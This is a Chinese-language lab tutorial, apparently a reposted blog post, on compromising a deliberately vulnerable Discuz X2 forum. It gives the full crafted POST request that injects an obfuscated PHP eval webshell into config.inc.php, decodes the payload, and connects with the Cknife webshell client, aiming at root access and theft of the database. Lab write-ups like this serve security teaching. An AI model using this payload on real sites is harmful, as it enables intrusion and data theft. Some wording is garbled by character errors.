本文共 2418 字,大约阅读时间需要 8 分钟。
快速搭建discuz论坛
使用kali下BurpSuite对discuz后台注入php木马
使用Cknife“菜刀”.上传webshell木马到网站
使用Webshell查看mysql数据库密码并盗取数据库
想要拿下一台主机A的权限:
1、了解一下这个服务器:端口,服务器版本,操作系统版本,找漏洞
2、拿到对A有一定权限的身份,如果对方是一个WEB服务器,就利用对方网站应用程序的漏洞,上传webshell然后提权
3、传上去后,得到apache用户普通权限,再提权成root
搭建一个LAMP环境,部署带有漏洞的discuz论坛
1、漏洞概述:
这漏洞出现在一个DZ X系列自带的转换工具里面
漏洞路径:utility/convert/data/config.inc.php
漏洞发生的原因是: config.inc.php这个文件在黑客通过post写入时,无任何过滤检测,所以黑客可以通过past方式往confiq.inc. php由写木马程序
触发漏洞过程:
1、在浏览器中访问打开http://192.168.138.146/utility/convert/index.php
2、使用/utility/convert/index.php 进行版本转换时,会自动创建utility/convert/data/config.inc.php文件
3、config.inc.php文件没有做过滤,黑客可以使用post方法对config.inc.php注入木马程序
渗透思路:
在centos7虚拟机xuegod63.上搭建LAMP环境
yum -y install mariadb-server mariadb httpd php php-mysql # 安装LAMP环境systemctl start httpdsystemctl start mariadbmysqladmin -u root password '123456'mysql -uroot -p123456MariaDB [(none)]>
unzip Discuz_X2_SC_UTF8.zipmv upload/* /var/www/html/mv utility/ /var/www/html/
cd /var/www/html/chown -R apache:apache uc_server/ data/ config/ uc_client/chown -R apache:apache utility/convert/data/iptables -F # 清空防火墙
浏览器输入http://192.168.138.146安装配置discuz论坛
使用kali 下BurpSuite对discuz后台注入php木马
在浏览IP://utility/convert/
请求断开
回到burpsuite查看截取到浏览器数据包:如果之前抓取到了别的数据包,需要先点击forward按钮,把之前的http请求都放行了,然后再访问我们需要访问的链接
右键点击空白处,选择sendto repeater, repeater [ru I pi:ta®]中继器
删掉
修改第一行:
GET /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1
为:注意 POST 后面没有回车 ,这里是文本显示自劢换行了。
POST
/utility/convert/index.phpa=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes HTTP/1.1
注:这是一个 php 一句话木马加密后的内容。翻译后的内容为:
POST /utility/convert/index.phpa=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval("$_POST[c];");//]=aaaa&submit=yes
再转换%0a%0d 代表回车换行
POST /utility/convert/index.phpa=config&source=d7.2_x2.0&newconfig[aaaeval("$_POST[c];")😉;
扩展 eval()凼数:
eval()凼数中的 eval 是 evaluate 的简称,这个凼数的作用就是把一段字符串当作 PHP 语句来执行,
一般情况下丌建议使用容易被黑客利用,evaluate [ɪvæljueɪt] 评价
eval(“echo’hello world’;”); 等同于下边的代码:
echo"hello world"; 在浏览器中都输出:hello world
修改完成后发送数据包
登录 CentOS 上,查看刚通过该漏洞注入的文件:
cd /var/www/html/utility/convert/data/vim config.inc.php
搭建 java 环境
yum -y install javajava -versionjava -jar Cknife.jar
http://192.168.138.149/utility/convert/data/config.inc.php
转载地址:http://eqnwi.baihongyu.com/